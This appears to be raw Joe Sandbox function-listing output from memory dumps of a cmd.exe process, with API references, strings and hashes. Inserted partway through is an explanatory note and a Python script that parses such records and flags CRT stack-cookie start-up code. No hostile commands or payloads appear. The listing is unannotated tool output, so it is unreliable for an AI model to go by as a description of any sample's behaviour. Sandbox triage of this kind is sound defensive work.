• API ID: _wcsicmpwcschr$iswspace
• String ID: KEYS$LIST$OFF
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
• Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
APIs
• memset.MSVCRT ref: 00245074
  • Part of subcall function 0024E3F0: memset.MSVCRT ref: 0024E455
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 0024515F
  • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BCA7
  • Part of subcall function 0024BC30: iswspace.MSVCRT ref: 0024BD1D
  • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BD39
  • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BD5D
• iswspace.MSVCRT ref: 00259289
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: wcschr$iswspacememset
• String ID: %s
APIs
• RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 00267121
• GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00267197
• GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 002671FF
Strings
• %WINDOWS_COPYRIGHT%, xrefs: 00267107
• Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 002670EE
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: Global$AllocAsciizCreateFreeFromStringUnicode
• String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
• Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00244D66
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00244D8A
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00244D95
Strings
• UBR, xrefs: 00244D82
• Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00244D5C
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
APIs
• memset.MSVCRT ref: 0024FD3A
• wcsspn.MSVCRT ref: 0024FF18
• ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,00252229,00000000,-00000105,?,00000000,00000000), ref: 0025000F
  • Part of subcall function 00251CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D3A
  • Part of subcall function 00251CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D44
  • Part of subcall function 00251CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D57
  • Part of subcall function 00251CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D61
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: ErrorMode$FullNamePathmemsetwcsspn
• String ID:
APIs
• _get_osfhandle.MSVCRT ref: 00269527
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0026952F
• _get_osfhandle.MSVCRT ref: 002695B5
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 002695BD
  • Part of subcall function 00268C50: longjmp.MSVCRT(00280A70,00000001,0024206C,00245E68,?,?,?,?,00000000), ref: 00268CC4
  • Part of subcall function 00268C50: memset.MSVCRT ref: 00268D1D
  • Part of subcall function 00268C50: memset.MSVCRT ref: 00268D45
  • Part of subcall function 00268C50: memset.MSVCRT ref: 00268D6D
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002695CC
  • Part of subcall function 0024A16C: _close.MSVCRT ref: 0024A19B
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
• String ID:
                                                                                                                                            • API String ID: 288106245-0
                                                                                                                                            • Opcode ID: 264e6b8d11762173ead8d9c1255f991b71631c1468f860e13b34a9de77d372f8
                                                                                                                                            • Instruction ID: 17dd265879eef5417424f007774706a1a76d15950618e4df8aa578f24e9cdd12
                                                                                                                                            • Opcode Fuzzy Hash: 264e6b8d11762173ead8d9c1255f991b71631c1468f860e13b34a9de77d372f8
                                                                                                                                            • Instruction Fuzzy Hash: BD31CF75A20205AFEF199F74E849BAE77ADEB44321F20412AF502D6280DF75DDD18B50
                                                                                                                                            APIs
                                                                                                                                            • _get_osfhandle.MSVCRT ref: 00254CC2
                                                                                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00268FB3,?,00000000,?,?,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 00254CCA
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00260BFC
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00260C48
                                                                                                                                            • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00260C71
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3588551418-0
                                                                                                                                            • Opcode ID: e30a12a6d0638adf5593d282f386fd03a26388e33a3fadd728841abe0d8990be
                                                                                                                                            • Instruction ID: 1d7bc1f40617c0255424b32ce92b7ead8b9bd68f8c73be41e917672c5dbf1e4d
                                                                                                                                            • Opcode Fuzzy Hash: e30a12a6d0638adf5593d282f386fd03a26388e33a3fadd728841abe0d8990be
                                                                                                                                            • Instruction Fuzzy Hash: E631D131631105AFEB1CAF24EC89A7FB769EF8530AB20442AE806C3250DB75DCE0DB55
                                                                                                                                            APIs
                                                                                                                                            • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00257122
                                                                                                                                            • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00257131
                                                                                                                                            • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 0025713A
                                                                                                                                            • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00257143
                                                                                                                                            • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00257158
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                            • Opcode ID: 89c5ed6dc31c94e82da299eb9a96005d853e70a930646fa113784a8fdd02aa98
                                                                                                                                            • Instruction ID: cd4ff5a7f792afd45a317baaa8957a8da50b55bfac267e672a3b7adacfbce1e3
                                                                                                                                            • Opcode Fuzzy Hash: 89c5ed6dc31c94e82da299eb9a96005d853e70a930646fa113784a8fdd02aa98
                                                                                                                                            • Instruction Fuzzy Hash: 15116675D05208ABDF10CFB8EA4C69EB7F5FF08311F618866D802E7264EA709B008B02
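The record above, with five direct calls in the order GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter, is the call sequence the MSVC CRT's __security_init_cookie uses to seed the stack cookie, so it is start-up boilerplate rather than sample-specific logic. As an added example (not part of this report and not Joe Sandbox tooling), the Python below parses records in the layout used on this page into structured objects, separates a function's own imports from those reached through "Part of subcall function" entries, keeps the Strings and Similarity fields, and tags a record matching that five-call sequence as CRT boilerplate. The labelling rule and the "review" default for everything else are this example's own assumptions; the sample input is copied from this page's listing with the indentation removed and some lines dropped.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Sample input copied from this report's listing (the GetStdHandle function, the five-call
# function at 0x257122 and one RTL string record), indentation removed, some lines dropped.
SAMPLE = """\
APIs
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,002587E5,00000000,?,00244A0A), ref: 0026484A
  • Part of subcall function 0024DD98: _get_osfhandle.MSVCRT ref: 0024DDA3
  • Part of subcall function 0024DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0025C050), ref: 0024DDAD
• FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,002587E5,00000000,?,00244A0A), ref: 00264879
• _getch.MSVCRT ref: 0026487F
Similarity
• API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
• String ID:
• API String ID: 491502236-0
APIs
• GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00257122
• GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00257131
• GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 0025713A
• GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00257143
• QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00257158
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• API String ID: 1445889803-0
Strings
• RTL: Re-Waiting, xrefs: 03C47BAC
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03C47B7F
Similarity
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_.-]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
STRING_RE = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-F]+)$")
# The MSVC CRT's __security_init_cookie mixes exactly these five values into the stack cookie;
# treating a function made of this call sequence as CRT start-up code is this example's rule.
CRT_SECURITY_COOKIE_INIT = ("GetSystemTimeAsFileTime", "GetCurrentProcessId", "GetCurrentThreadId",
                            "GetTickCount", "QueryPerformanceCounter")

@dataclass
class ApiCall:
    name: str
    module: str
    ref: int
    parent: Optional[int] = None  # address of the subcall through which the import is reached

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (text, xref address)
    meta: dict = field(default_factory=dict)     # Similarity / dump-source key-value lines

    @property
    def direct_calls(self):
        return [c for c in self.calls if c.parent is None]

    @property
    def start(self):
        # Lowest reference the function makes itself; subcall refs belong to other functions.
        refs = [c.ref for c in self.direct_calls] + [ref for _, ref in self.strings]
        return min(refs) if refs else None

def parse_records(text):
    records, current, section = [], None, None
    for line in filter(None, map(str.strip, text.splitlines())):
        if line in SECTIONS:
            # "APIs"/"Strings" after a Similarity block (or at the top) opens a new record.
            if line in ("APIs", "Strings") and (current is None or section == "Similarity"):
                current = FunctionRecord()
                records.append(current)
            section = line
        elif current is None:
            continue
        elif section == "APIs":
            if m := API_RE.match(line):
                parent = int(m["parent"], 16) if m["parent"] else None
                current.calls.append(ApiCall(m["name"], m["module"], int(m["ref"], 16), parent))
        elif section == "Strings":
            if m := STRING_RE.match(line):
                current.strings.append((m["text"], int(m["ref"], 16)))
        else:
            key, _, value = line.lstrip("• ").partition(":")
            current.meta[key.strip()] = value.strip()
    return records

def classify(rec):
    names = tuple(c.name for c in rec.direct_calls)
    return "crt:__security_init_cookie" if names == CRT_SECURITY_COOKIE_INIT else "review"

def triage(text):
    """(start address, label, direct API names) per record, in listing order."""
    return [(f"{r.start:08X}" if r.start is not None else "?", classify(r),
             [c.name for c in r.direct_calls]) for r in parse_records(text)]
```

Running triage(SAMPLE) labels the 00257122 record as CRT cookie initialisation and leaves the other two for review. The subcall entries are kept on the record but excluded from its start address and its classification, since they describe a callee shared by many functions, not the function itself.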
                                                                                                                                            APIs
                                                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,002587E5,00000000,?,00244A0A), ref: 0026484A
                                                                                                                                              • Part of subcall function 0024DD98: _get_osfhandle.MSVCRT ref: 0024DDA3
                                                                                                                                              • Part of subcall function 0024DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0025C050), ref: 0024DDAD
                                                                                                                                            • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,002587E5,00000000,?,00244A0A), ref: 00264879
                                                                                                                                            • _getch.MSVCRT ref: 0026487F
                                                                                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,002587E5,00000000,?,00244A0A), ref: 00264897
                                                                                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,002587E5,00000000,?,00244A0A), ref: 002648AD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 491502236-0
                                                                                                                                            • Opcode ID: 24946be60109dbb51b0522fe81c8ba04926428707d6cf8a948bc7f36a561283d
                                                                                                                                            • Instruction ID: 7429aa9cf69727acff22a74e1c9fe2be26ccfaea1d95c04c789f8ad5817801eb
                                                                                                                                            • Opcode Fuzzy Hash: 24946be60109dbb51b0522fe81c8ba04926428707d6cf8a948bc7f36a561283d
                                                                                                                                            • Instruction Fuzzy Hash: 0A01DF36026351EFEB18BBA0FC0EB5E3B64DF01720F10011AF84A961A0DFB199E48F91
                                                                                                                                            Strings
                                                                                                                                            • RTL: Re-Waiting, xrefs: 03C4031E
                                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03C402E7
                                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03C402BD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                            • API String ID: 0-2474120054
                                                                                                                                            • Opcode ID: 25d1331e4765eaf166edbdc635935eec3b88502dbbcec04df6f8d55ed89799e6
                                                                                                                                            • Instruction ID: b74640b9fc1d7a83c26eb66437055ff53810a78d9a5504db0e5a7b40142d4baf
                                                                                                                                            • Opcode Fuzzy Hash: 25d1331e4765eaf166edbdc635935eec3b88502dbbcec04df6f8d55ed89799e6
                                                                                                                                            • Instruction Fuzzy Hash: DCE1AD746047419FD725CF28C884B2AF7E0FB85718F184AADE6A5CB2E1D774E948CB42
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00246513: memset.MSVCRT ref: 00246593
                                                                                                                                              • Part of subcall function 0024DC60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00248E86,00248E5A,00000000), ref: 0024DC98
                                                                                                                                              • Part of subcall function 0024DC60: RtlFreeHeap.NTDLL ref: 0024DC9F
                                                                                                                                            • memset.MSVCRT ref: 0025A097
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heapmemset$FreeProcess
                                                                                                                                            • String ID: *.*
                                                                                                                                            • API String ID: 1291122668-438819550
                                                                                                                                            • Opcode ID: 56ab45543c652ee8ca45ed0b34aaf4d6fe5588960a1a80d018b55f6f014844bb
                                                                                                                                            • Instruction ID: 28f53b0be2f656e2a29ff04690a0ae0bef300927523b08a594110ac8940ae5fc
                                                                                                                                            • Opcode Fuzzy Hash: 56ab45543c652ee8ca45ed0b34aaf4d6fe5588960a1a80d018b55f6f014844bb
                                                                                                                                            • Instruction Fuzzy Hash: 07B1E271D20206AFCF28DFA4C886AAEB7B1EF58701F148159EC09AB241D731DD65CF95
                                                                                                                                            APIs
                                                                                                                                            • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00265997
                                                                                                                                              • Part of subcall function 0024AB7F: iswspace.MSVCRT ref: 0024AB8D
                                                                                                                                              • Part of subcall function 0024AB7F: wcschr.MSVCRT ref: 0024AB9E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Enumiswspacewcschr
                                                                                                                                            • String ID: %s=%s$\Shell\Open\Command
                                                                                                                                            • API String ID: 3493821229-3301834661
                                                                                                                                            • Opcode ID: b20b6ab1973a8bdd999c4457f62a1ea89c2ecfceb66c721deeab1ec2432587f0
                                                                                                                                            • Instruction ID: 553dbbd4f22ba8fd7a765ac3b6a1b0d8ea5d03b81a97d465a751e48e27f9f688
                                                                                                                                            • Opcode Fuzzy Hash: b20b6ab1973a8bdd999c4457f62a1ea89c2ecfceb66c721deeab1ec2432587f0
                                                                                                                                            • Instruction Fuzzy Hash: 7A816C75E2062A5BDB28DF68CCC5BFA7379EF90704F1441A9E80A97140EA708ED18F90
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID:
• String ID: GeToken: (%x) '%s'$Ungetting: '%s'
• API String ID: 0-1704545398
• Opcode ID: 083bdcc6cc81f018422cbb98f06e90d207c9a97bd17e0bbe25756f5d2d6318b3
• Instruction ID: 96c16e28f21d1170b4cd981968357a4703918c85c333254c14fa2693cd7f89d0
• Opcode Fuzzy Hash: 083bdcc6cc81f018422cbb98f06e90d207c9a97bd17e0bbe25756f5d2d6318b3
• Instruction Fuzzy Hash: D2512935B3210386DBACBF6CA85977A7662EB50314F654136D8068B291EBF19CB0CB91
Strings
• RTL: Re-Waiting, xrefs: 03C47BAC
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03C47B7F
• RTL: Resource at %p, xrefs: 03C47B8E
Memory Dump Source
• Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
• Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
Similarity
• API ID:
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 0-871070163
• Opcode ID: 7dc76032463d7d2427788b927b3a5b8cb12458d375fc90d9b2ee93b4a9640208
• Instruction ID: 44b83532b6b25e66c3f07a3df5e9e7e9a35b71d2c81db692b1cd61e94638a987
• Opcode Fuzzy Hash: 7dc76032463d7d2427788b927b3a5b8cb12458d375fc90d9b2ee93b4a9640208
• Instruction Fuzzy Hash: 974106397047429FC724DE25CC40B6AB7E9EF89710F040A6DF96ADF680DB70E9458B91
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03C4728C
Strings
• RTL: Re-Waiting, xrefs: 03C472C1
• RTL: Resource at %p, xrefs: 03C472A3
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03C47294
Memory Dump Source
• Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
• Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
• Opcode ID: 83fbfd4a088c6940f6a8c6004cea23e3bc6ddc834cccc5e755026f86085ba07d
• Instruction ID: 3de304f1cb437da52af8a5ae38c19cd6154cc49ca567ab13c325e84fd38ec25d
• Opcode Fuzzy Hash: 83fbfd4a088c6940f6a8c6004cea23e3bc6ddc834cccc5e755026f86085ba07d
• Instruction Fuzzy Hash: B741FD75700742ABC720DE65CC41B6AB7A9FB84710F140629F865EF280DB21F9929BD1
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
• Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: 44ed0d62170dd9e059d191d0ccd5afca994564599e9be9cd8f97a3f924e94c46
• Instruction ID: 8efbba81ef623c817705dea88f3a43ed59bbf064209bd6940baaff093b828c2d
